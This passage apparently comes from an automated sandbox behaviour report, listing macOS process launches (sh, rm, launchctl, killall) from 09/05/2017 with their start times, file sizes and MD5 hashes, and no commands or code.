File size:144384 bytes
MD5 hash:f0209b39eba8aa88c1e94bb653698641

General

Start time:16:26:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:39
Start date:09/05/2017
Path:/bin/rm
File size:23744 bytes
MD5 hash:e8926d2347850b76f57a1d5f0226de8b

General

Start time:16:26:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:39
Start date:09/05/2017
Path:/bin/launchctl
File size:124048 bytes
MD5 hash:dbfeff92b30d89c0a04dd0fbeb40ae5e

General

Start time:16:26:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:39
Start date:09/05/2017
Path:/usr/bin/killall
File size:23872 bytes
MD5 hash:e27cce82be3cba31a2486d00964d1c5e

General

Start time:16:26:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:39
Start date:09/05/2017
Path:/usr/bin/killall
File size:23872 bytes
MD5 hash:e27cce82be3cba31a2486d00964d1c5e

General

Start time:16:26:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:39
Start date:09/05/2017
Path:/bin/rm
File size:23744 bytes
MD5 hash:e8926d2347850b76f57a1d5f0226de8b